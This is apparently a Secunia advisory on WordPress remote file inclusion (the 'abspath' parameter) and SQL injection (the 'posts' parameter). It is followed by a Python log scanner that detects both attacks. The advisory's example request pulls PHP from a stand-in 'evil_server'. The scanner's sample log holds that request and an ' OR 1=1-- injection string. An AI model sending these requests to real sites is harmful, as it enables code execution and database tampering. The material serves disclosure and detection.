Description: Two vulnerabilities have been identified in WordPress allowing malicious people to execute arbitrary PHP or inject SQL.
One problem is that the "abspath" parameter isn't verified in the "/wp-links/links.all.php" script.
By requesting "/wp-links/links.all.php?abspath=http://evil_server", it is possible to include a malicious "/blog.header.php" PHP script from "http://evil_server".
The other problem is that the "posts" parameter isn't verified in "/blog.header.php" before it is used in an SQL statement. This allows malicious people to manipulate SQL queries.
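As an added example that is not part of this advisory, the following check scans web-server access logs for the two request patterns described above: an "abspath" value that is a URL rather than a local path (remote include attempt against links.all.php) and a "posts" value carrying SQL metacharacters. It assumes an Apache-style combined log line and that "posts" is expected to be a numeric identifier; the log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined-style); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2004:10:00:01 +0000] "GET /wp-links/links.all.php?abspath=/var/www/blog HTTP/1.1" 200 512
10.0.0.9 - - [12/Jan/2004:10:00:07 +0000] "GET /wp-links/links.all.php?abspath=http://evil_server HTTP/1.1" 200 1024
10.0.0.9 - - [12/Jan/2004:10:00:09 +0000] "GET /wp-links/links.all.php?abspath=HTTPS://evil_server/ HTTP/1.1" 200 1024
10.0.0.7 - - [12/Jan/2004:10:01:15 +0000] "GET /index.php?posts=5 HTTP/1.1" 200 2048
10.0.0.9 - - [12/Jan/2004:10:01:20 +0000] "GET /index.php?posts=5'%20OR%201=1-- HTTP/1.1" 200 8192
"""

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# A scheme prefix means abspath points at a remote resource, not a directory on disk.
URL_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
# Crude SQL metacharacter/keyword signature; tuned for a field that should be numeric.
SQL_META_RE = re.compile(r"['\"]|--|/\*|\b(union|select|or|and)\b", re.IGNORECASE)

def classify_request(target):
    """Return a list of finding tags for one request target, or [] if it looks clean."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for value in params.get("abspath", []):
        if URL_SCHEME_RE.match(value):
            findings.append("rfi:abspath")
    # Assumption: "posts" carries a numeric id, so anything non-numeric with SQL syntax is suspect.
    for value in params.get("posts", []):
        if not value.isdigit() and SQL_META_RE.search(value):
            findings.append("sqli:posts")
    return findings

def scan_log(text):
    """Return (client_ip, target, findings) for each log line that triggers a finding."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((line.split(" ", 1)[0], m.group("target"), findings))
    return hits

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, ",".join(findings))
```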
If you have new information regarding this Secunia advisory or a product in our database, please send it to us using either our web form or email us at vuln@secunia.com.